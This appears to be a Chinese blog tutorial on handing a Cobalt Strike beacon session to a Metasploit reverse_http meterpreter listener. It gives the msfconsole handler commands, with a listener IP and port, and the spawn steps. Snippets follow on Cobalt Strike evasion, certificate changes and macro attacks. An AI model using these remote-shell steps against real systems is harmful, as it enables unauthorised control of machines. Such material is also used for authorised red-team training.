2. 程式人生 > 實用技巧 >Cobalt strike 派生shell給MSF

Cobalt strike 派生shell給MSF

阿新 發佈:2020-10-23

Cobalt strike 派生shell給MSF,前提是要有beaconshell:
在msf使用監聽模組,並設定相關選項:
use exploit/multi/handle
set payload windows/meterpreter/reverse_http
set lhost 10.6.18.56
set lport 4321
run -j
在這裡插入圖片描述

回到Cobalt strike中新增監聽器payload為 windows/foreign/reverse_httpc,ip為msf的ip監聽埠為msf監聽的埠:
在這裡插入圖片描述
下面為剛建立的監聽器:
在這裡插入圖片描述
選中要派生的shell右擊spawn選擇剛剛建立的監聽器:
在這裡插入圖片描述
在這裡插入圖片描述
點選Choose

我是漢化版的叫增加會話,英文版為spawn,一樣的。

回到msf,輸入sessions -i 5 命令 ,我們可以看到獲取到了meterpreter會話:
在這裡插入圖片描述

相關推薦

Cobalt strike 派生shellMSF

Cobalt strike 派生shellMSF,前提是要有beaconshell: 在msf使用監聽模組,並設定相關選項: use exploit/multi/handle set payload windows/meterpreter/reverse_http set lhost 10.6.18.56 set lport 43

Cobalt Strike修改證書

Keytool是一個Java資料證書的管理工具,Keytool將金鑰(key)和證書(certificates)存在一個稱為keystore的檔案中,即store字尾檔案中。

Cobalt Strike特徵性資訊修改玩轉防火牆裝置

0x00 前言 Cobalt Strike 服務端和客戶端是通過 SSL 加密通訊的,由於SSL配置檔案和代理配置檔案由於預設配置導致keystore檔案內容通常被用於防火牆識別。

Cobalt Strike後滲透安裝和初步使用

Cobalt Strike安裝 系統要求 Cobalt Strike要求Java 1.8,Oracle Java 11,或OpenJDK 11。 如果你的系統上裝有防病毒產品,請確保在安裝 Cobalt Strike 前將其禁用

部署Cobalt Strike 4.0服務

1.基於CentOS 7.8環境 首先安裝OpenJDK軟體包,如果已經安裝可以忽略本節內容。 sudo yum -y install java-1.8.0-openjdk-devel

工具使用-Cobalt strike(1)

0x01簡介 Cobalt Strike是一款美國Red Team開發的滲透測試神器,常被業界人稱為CS。其擁有多種協議主機上線方式,集成了提權,憑據匯出,埠轉發,socket代理,office攻擊,檔案捆綁,釣魚等功能。同時,Cobalt Str

Cobalt Strike基本使用

Cobalt Strike簡介 Cobalt Strike是一款由java編寫的全平臺多方協同滲透測試框架,在3.0版本之前它基於Metasploit框架工作,在3.0後的版本以獨立成一個滲透測試平臺。CobaltStrike集成了埠轉發、埠掃描、socket代理

Cobalt-Strike Office巨集利用

Cobalt-Strike Office巨集利用   首先說明我使用的是kali+win7+自己的主機來做實驗,環境均為內網。

Cobalt Strike 之: Malleable C2

鄭重宣告: 本筆記編寫目的只用於安全知識提升,並與更多人共享安全知識,切勿使用筆記中的技術進行違法活動,利用筆記中的技術造成的後果與作者本人無關。倡導維護網路安全人人有責,共同維護網路文明和諧。

使用shell指令碼來mysql加索引的方法

shell指令碼來mysql加索引 剛好用到, mark一下: #! /bin/bash tb_base=tb_student_ arr=(\"0\" \"1\" \"2\" \"3\" \"4\" \"5\" \"6\" \"7\" \"8\" \"9\" \"a\" \"b\" \"c\" \"d\" \"e\" \"f\")

shell指令碼檔案批量編號

技術標籤:搬磚雜記linuxubuntubash 版磚的時候可能會需要資料夾下的所有檔案編號,現成的軟體一時半會兒找不到,可能會被開除。於是有這功夫不如自己寫個指令碼,一執行就好了,非常滴湮性化!

Cobaltstrike與MSF會話派生

Cobaltstrike與MSF會話派生 前言 一般在滲透的過程中,Get到shell之後一般來說我喜歡上線到Cobaltstrike,但是Cobaltstrike的會話是60S更新一次,有時候功能也並沒有MSF完善(我的外掛不夠厲害哈哈),那麼今天我準備記錄

RxSwift: 麻煩我的愛人來一個 DisposeBag

序 上篇文章 mojito: 麻煩我的愛人來一份 RxSwift 沒有提及 DisposeBag 回收機制 原因有其二

mojito: 麻煩我的愛人來一份 RxSwift

序 學過 Swift 的 同學都知道, RxSwift 宛如 周董的 mojito 開始微醺 再者上頭 為什麼要學習 RxSwift ?

?冒著期末掛科的風險也要你看的訊息佇列和RocketMQ入門總結

吐槽 文章很長,點贊再看,養成好習慣??? 這真的是考前的最後一篇部落格,再寫真的要掛科了。

Shell在程式碼重構中的應用瞭解下

程式碼重構(Code refactoring)有時是很枯燥的,字串替換之類的操作不僅乏味,而且還容易出錯,好在有一些工具可用,以PHP為例,如:Rephactor,Scisr等等,不過現成的工具往往意味著不夠靈活,所以今天我要說說S

Java程式設計師的TypeScript入門教程(二)

本文內容承接本系列的上一篇《寫Java程式設計師的TypeScript入門教程(一)》。上一篇介紹了本系列教程的背景,並進行了開發環境的搭建。本系列的教學思路是通過專案實戰來學習TypeScript,選取了一個簡單的雲服務

後端的Docker初級入門教程:實現高效率自動化部署

在上一篇文章面向後端的Docker初級入門教程:DockerFile 命令詳解 中,我們比較詳細的講解了docker映象構建指令碼DockerFile的使用和命令,DockerFile的出現讓構建Docker映象的過程更加直觀和高效,但是,和我之前大

漫話:如何女朋友解釋什麼是P2P?

​我滿臉疑惑,什麼時候P2P火了呢?還是按耐住心中的疑問,好不容易女朋友機會,兄弟已經在臺球廳等我了,不管咋樣先表現一波。

後端的Nginx初級入門教程:Nginx原理初探

在上一篇文章寫後端的Nginx初級入門教程:配置高可用叢集 中,我們使用keepalived實現了我們Nginx伺服器的高可用配置,防止因為Nginx伺服器掛掉而導致整個應用掛掉的這種情況的發生。而Nginx作為當下最受歡迎的web伺